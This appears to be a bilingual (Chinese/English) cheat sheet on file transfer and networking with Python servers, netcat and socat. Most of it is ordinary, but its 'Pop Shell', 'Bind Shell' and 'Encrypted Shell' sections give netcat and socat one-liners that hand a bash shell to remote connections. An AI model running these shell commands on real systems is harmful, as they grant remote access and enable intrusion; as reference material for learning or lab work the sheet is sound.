檔案傳輸 (Transferring files)
http server
1
2python -m SimpleHTTPServer 8080
python3 -m http.server 8080ftp server
1
2python -m pyftpdlib -p 2121 -w
python3 -m pyftpdlib -p 2121 -w
NC (netcat)
Connection to server
TCP Server
1
2
3
4
5# nc <domain_name> <PORT>
nc host.example.com 80
# nc [-param] <IP> <PORT>
nc -nv 127.0.0.1 80-n
: Skip DNS name resolution-v
: Add some verbosity
1
nc -p 31337 -w 5 host.example.com 80
-p
: Specifiy source port31337
-w
: Wait for5
second
UDP Server
1
nc -u host.example.com 53
As A Server
TCP Server
1
nc -nlvp 4443
-l
: Create a listener-p
: Specify the listening port number
Pop Shell
1
2
3
4
5
6# Linux
nc -nlvp 4444 -e /bin/bash
# Mac (& connect twice)
nc -lp 4444 | /bin/bash | nc -lp 4444
netcat -nlvp 4444 -e /bin/bashTalk to HTTP Server
1
printf "GET / HTTP/1.0\r\n\r\n" | nc host.example.com 80
Talk to SMTP Server
1
2
3
4
5
6
7
8
9nc [-C] localhost 25 << EOF
HELO host.example.com
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
DATA
Body of e-mail.
.
QUIT
EOFPort Scanning
1
2
3
4
5# Continous
nc -zv host.example.com 20-30
#Specifiy
nc -zv host.example.com 80 20 22Test each server who is running
1
echo "QUIT" | nc host.example.com 20-30
Creates and listens on a UNIX-domain stream socket.
1
2
3
4nc -lU /var/tmp/dsocket
# Connects to port 42 of host.example.com via an HTTP proxy at 10.2.3.4, port 8080.
nc -x10.2.3.4:8080 -Xconnect host.example.com 42
SOCAT
直接連線
1
2# socat TCP4:<domain/IP>:<PORT> [Output]
socat TCP4:server.maojui.me:4444 STDOUT接收內容寫並入檔案
1
2# socat TCP4:<domain/IP>:<PORT> file:<write_response_to>,create
socat TCP4:server.maojui.me:4444 file:received_secret_passwords.txt,createSocat Encrypted Bind Shells
1
socat - OPENSSL:10.11.0.4:443,verify=0
As A Server
1
2
3
4# tcp-listen:<PORT>,<param>,... : 等待連線
socat TCP4-LISTEN:443 STDOUT
socat -d -d TCP4-LISTEN:443 STDOUT-d
: For more connection detail.-d -d
: Showing fatal, error, warning, and notice messages.Share the file
1
socat TCP4-LISTEN:443,fork,reuseaddr file:secret_passwords.txt
Pop Shell
1
2# 把 bash 噴給在 127.0.0.1:443 Listen 的 Service
socat TCP4:127.0.0.1:443 EXEC:/bin/bashBind Shell
1
2
3
4
5# 把 Bash Shell 噴給任何從 443 PORT 連進來的人
socat -d -d TCP4-LISTEN:443 EXEC:/bin/bash
# 把 Bash Shell 噴給任何從 443 PORT 連進來但有憑證的人
socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=1,fork EXEC:/bin/bashExecute when TCP connect
1
2# socat -v tcp-listen:10000,fork,reuseaddr,su=ctf EXEC:"$COMMAND"$EXTRA
socat tcp-listen:4123,fork,reuseaddr,su=ctf EXEC:"python exp.py"su
: user permission
Encrypted Shell
1
2# cert=<cert.pem>
socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bashcert
: 憑證verify
: 是否啟用 SSL 連線, 0=disable, 1=enable